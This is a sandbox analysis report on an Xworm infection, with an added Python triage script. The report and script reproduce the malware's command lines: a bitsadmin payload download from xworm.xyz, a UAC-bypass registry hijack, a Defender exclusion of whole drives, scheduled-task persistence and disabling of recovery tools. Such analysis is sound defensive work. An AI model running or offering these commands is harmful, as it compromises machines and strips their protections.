C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
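The Python below is an added triage aid, not part of the sandbox output or of the analysed sample. It works over the command lines in the process list above: it decodes the -EncodedCommand argument (Base64 over UTF-16LE), strips the <# ... #> block comments the operator inserted between tokens (what the "Command Obfuscation" signature fires on), parses the REG ADD lines from reset survival.bat into key/value/type/data records with a proposed revert, and tags each line with the pattern behind the corresponding signature. The sample command lines are copied from this report; the label names, the function names and the revert heuristic (policy values do not exist on a clean system and can be deleted, anything else needs its pre-infection value restored) are my own assumptions. One piece of context the report does not state: HKCU\Software\Classes\mscfile\shell\open\command is the per-user handler consulted when an auto-elevating .msc launcher such as eventvwr.exe opens its console, which is why the reg add is labelled a UAC bypass; the report records only the reg add, not a launcher process, so treat that inference accordingly.

```python
"""Added triage helpers for the process tree above; not part of the sandbox output."""
import base64
import re
from typing import Optional

# Copied verbatim from the powershell.exe -EncodedCommand line in the process list.
ENCODED_COMMAND = "PAAjAGcAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAagBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbgB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZgBmACMAPgA="

# Constructed subset of the command lines listed above (one line per technique).
SAMPLE_CMDLINES = [
    "net session",
    r'reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f',
    r"bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat",
    'certutil -decodehex temp.hex "Uni.exe"',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "' + ENCODED_COMMAND + '"',
    r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f',
    r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f',
    "reagentc /disable",
]

ENC_FLAG = re.compile(r'-e(?:c|nc(?:odedcommand)?)?\s+"?([A-Za-z0-9+/=]+)"?', re.I)
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')  # cmd.exe-style tokens: quoted or bare

RULES = [  # label (mine) -> pattern behind the matching sandbox signature
    ("UAC bypass: mscfile handler hijack", re.compile(r"mscfile\\shell\\open\\command", re.I)),
    ("Elevation check (net session)", re.compile(r"\bnet1?\s+session\b", re.I)),
    ("Download via BITS", re.compile(r"\bbitsadmin\b.*/transfer", re.I)),
    ("certutil decode of dropped payload", re.compile(r"\bcertutil\b.*-decode(?:hex)?\b", re.I)),
    ("Defender exclusion added", re.compile(r"Add-MpPreference.*-Exclusion(?:Path|Process|Extension)", re.I)),
    ("Scheduled task persistence (/RL HIGHEST)", re.compile(r"\bschtasks\b.*/create.*/RL\s+HIGHEST", re.I)),
    ("Encoded PowerShell", ENC_FLAG),
    ("Recovery environment disabled", re.compile(r"\breagentc\s+/disable|NoWinRE|DisableResetPC", re.I)),
    ("System Restore disabled", re.compile(r"SystemRestore|\\Services\\sr\b", re.I)),
    ("Admin tool lockdown", re.compile(r"DisableTaskMgr|DisableRegistryTools|DisableCMD", re.I)),
    ("Boot-time autochk removed", re.compile(r"BootExecute", re.I)),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries Base64 over UTF-16LE; return the script, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    return base64.b64decode(blob).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Remove <# ... #> comments used as token padding and normalise whitespace."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def parse_reg_add(cmdline: str) -> Optional[dict]:
    """Parse `REG ADD <key> [/v name | /ve] [/t type] [/d data] [/f]` and propose a revert."""
    tokens = [q or u for q, u in TOKEN.findall(cmdline)]
    if len(tokens) < 3 or [t.lower() for t in tokens[:2]] != ["reg", "add"]:
        return None
    rec = {"key": tokens[2], "value": None, "type": "REG_SZ", "data": None}
    fields = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag == "/ve":
            rec["value"] = ""  # the key's (Default) value
        elif flag in fields and i + 1 < len(tokens):
            i += 1
            rec[fields[flag]] = tokens[i]
        i += 1
    rec["type"] = rec["type"].upper()
    # Heuristic (assumption): policy values are absent on a clean system, so deleting
    # them is the revert; anything else (AutoRestartShell, BootExecute, ...) needs its
    # pre-infection value restored rather than deleted.
    if rec["value"] == "":
        rec["revert"] = f'reg delete "{rec["key"]}" /ve /f'
    elif rec["value"] and "\\policies\\" in rec["key"].lower():
        rec["revert"] = f'reg delete "{rec["key"]}" /v "{rec["value"]}" /f'
    else:
        rec["revert"] = "restore pre-infection value; do not assume a default"
    return rec


def triage(cmdline: str) -> dict:
    """Tag one command line; encoded PowerShell is decoded and tagged on its plaintext."""
    decoded = decode_encoded_command(cmdline)
    plain = strip_block_comments(decoded) if decoded is not None else None
    haystack = cmdline if plain is None else cmdline + "\n" + plain
    return {"cmdline": cmdline, "decoded": plain, "registry": parse_reg_add(cmdline),
            "labels": [name for name, rx in RULES if rx.search(haystack)]}


if __name__ == "__main__":
    for r in map(triage, SAMPLE_CMDLINES):
        print(r["labels"], "<-", r["decoded"] or r["cmdline"][:60])
        if r["registry"]:
            print("    revert:", r["registry"]["revert"])
```

Decoded and stripped, the encoded command is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the entire user profile and system drive from Defender scanning; it is the same Add-MpPreference family as the plain-text powershell.exe lines earlier in the process list, only wrapped in comment padding so that a string match on the raw command line misses it.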
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | las-protected.gl.at.ply.gg | udp |
| US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.18:59571 | las-protected.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/260-0-0x00007FF9FC433000-0x00007FF9FC434000-memory.dmp
memory/260-5-0x00000217001B0000-0x00000217001D2000-memory.dmp
memory/260-8-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
memory/260-9-0x0000021700380000-0x00000217003F6000-memory.dmp
memory/260-10-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_11wev4dl.sau.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/260-25-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
memory/260-31-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
| MD5 | 011e90b162cf67f34f91d6d563859817 |
| SHA1 | 30ce18995be9545ae88189bc3ff5defbd2392d11 |
| SHA256 | 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613 |
| SHA512 | 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d |
C:\Users\Admin\AppData\Local\Temp\temp.hex
| MD5 | fad3aaf3015914e834a9d0313fcd371b |
| SHA1 | a4715a153a79263436819905b87b54acae4b2227 |
| SHA256 | 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690 |
| SHA512 | 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a |
C:\Users\Admin\AppData\Local\Temp\Uni.exe
| MD5 | 09e870076cfaa16f20be5050834ba8ff |
| SHA1 | 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840 |
| SHA256 | f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4 |
| SHA512 | d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643 |
memory/468-39-0x0000000000D30000-0x0000000000D40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 56efdb5a0f10b5eece165de4f8c9d799 |
| SHA1 | fa5de7ca343b018c3bfeab692545eb544c244e16 |
| SHA256 | 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108 |
| SHA512 | 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da91425d0490a65f6e9317a1e831bdd2 |
| SHA1 | 46886dde43736432786516865dc7c2536398ea11 |
| SHA256 | 6e8bb649646ea0d2c9acf771dc32b365c08eb26b4f5bf88b003726ca3940a379 |
| SHA512 | abc0776b5c1885b9cda6b5ba5fa500afecc229309502c851e8db89c4aacd892acd7f9b08933a03e8b9bbfc3f1dfd477d53c25bf631015c2a43fa64804485efec |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9ff10ce90fa1f5a4e14683fade00fb08 |
| SHA1 | 200b762060211bfda71bd56157a50b20bf7aa842 |
| SHA256 | fc9dc034c4b550190df44882e548b24ec1a6f5a4bc92b88869b377f3ffc03185 |
| SHA512 | ef628c6b0f6fd67b3ba0684585df407716f8e03f29a9c1b72eee7615d1c315e1c832fe4095b1fa0e4690df0a02b6c331b0a3b5d6099cdcd8291ab1fdd7f19cc2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | de68ca68ee303dfddbd9454fa0936cc9 |
| SHA1 | 98e6c9050a451a86bf92abe4180cc67d2aea5819 |
| SHA256 | 104a212eae1936ca7621842115c62bdfc2e69d67d19d3bdbdac91209a67f5272 |
| SHA512 | 19de3dd8d3abca2388f563aa519aca32df4eeeb4ae0ed4d13979da4f8f019fd3e000f7f1e54214423fd82358c23f1d74b238540902a52cfc0046b5ffa84feedb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ae79f9644a1cb6c2536b818e32c2a2ef |
| SHA1 | f2f11f31c742f37c57021d9f758bf01d0f4cd827 |
| SHA256 | fd223703c5342d45b55338ca56af0f1ca7c06b9128c9e20d9777bcbbde43dd0d |
| SHA512 | 2c373f393a0813f2400db4aa3f365bd448c1ce877f5c36b5ffc3d9e7e8d59315f0ae025a6057125d2cb1eeedc15aaeb0fe6772bab32cb46232362af5d1a5b34e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log
| MD5 | 16c5fce5f7230eea11598ec11ed42862 |
| SHA1 | 75392d4824706090f5e8907eee1059349c927600 |
| SHA256 | 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151 |
| SHA512 | 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc |
C:\Users\Admin\AppData\Local\Temp\cknnzt.exe
| MD5 | 2841cd968c72817f9eef3a4bc2293d6e |
| SHA1 | 5b788259d501493a87f00deee64fa0943ab19e34 |
| SHA256 | e5a9784f523a6965622532199a42f696ca15557b473f84c12f18210085a20e95 |
| SHA512 | 82eded2b67775763669452be98f7c5eeb0a3cd34f4947753fef9cedea4a1f56b49223ed7ad8e68b77e54ab2bf004e9ba22107afdc23e2e168dc60f2013907bf0 |
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
| MD5 | 1d62aa3d19462f3d5575fc54159911b4 |
| SHA1 | b37eab86c0075245fcc517a280f0705f6dffb852 |
| SHA256 | 6acaae0fb470790102a338e23dfe2263f31e529288e4efe51b34bca30371cb36 |
| SHA512 | 78a9501d7920920577a586396e5d9e2278a7c926448c9a98d7844db9032dbd887df90d2f389fe1754bf5a2071a19dfd5d40315624923e903ef9ef6cbb214b1df |
memory/708-236-0x000002532B540000-0x000002532B57C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\reset survival.bat
| MD5 | ecde221cbc92ee55ae5b8c1a24e98f56 |
| SHA1 | ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee |
| SHA256 | b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb |
| SHA512 | 122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493 |
memory/4268-240-0x00000000071D0000-0x0000000007206000-memory.dmp
memory/4268-241-0x0000000007840000-0x0000000007E68000-memory.dmp
memory/4268-247-0x0000000007EE0000-0x0000000007F02000-memory.dmp
memory/4268-248-0x0000000008060000-0x00000000080C6000-memory.dmp
memory/4268-249-0x00000000080D0000-0x0000000008136000-memory.dmp
memory/4268-250-0x0000000008240000-0x0000000008590000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 74f05ed3358c5a90314fc3f2de8edbbb |
| SHA1 | a83797f4b6d98240dbf3154dd1fdd9fd8f299a14 |
| SHA256 | e15317e9b6c7b084a44146b2bf4a501af327f0f3b2894451afc8db4c52855093 |
| SHA512 | 5158d6b1e910a230c207ba9f5184d72867092b07fe9807cdc1c5b4e34ee21b971911419e2e6ab4ee39f47afa714e9a6b2bb7467fc3ac509279ed0fb72e2a4fa9 |
memory/4268-252-0x0000000008010000-0x000000000802C000-memory.dmp
memory/4268-253-0x0000000008A10000-0x0000000008A5B000-memory.dmp
memory/4268-254-0x0000000008950000-0x00000000089C6000-memory.dmp
memory/4268-271-0x0000000009820000-0x0000000009853000-memory.dmp
memory/4268-272-0x0000000073040000-0x000000007308B000-memory.dmp
memory/4268-273-0x00000000097E0000-0x00000000097FE000-memory.dmp
memory/4268-278-0x0000000009990000-0x0000000009A35000-memory.dmp
memory/4268-279-0x0000000009D50000-0x0000000009DE4000-memory.dmp
memory/4268-472-0x0000000009CF0000-0x0000000009D0A000-memory.dmp
memory/4268-477-0x0000000009CE0000-0x0000000009CE8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-27 23:17
Reported
2024-07-27 23:28
Platform
win11-20240709-en
Max time kernel
598s
Max time network
603s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Disables use of System Restore points
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\certutil.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\Recovery | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Recovery\ReAgent.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
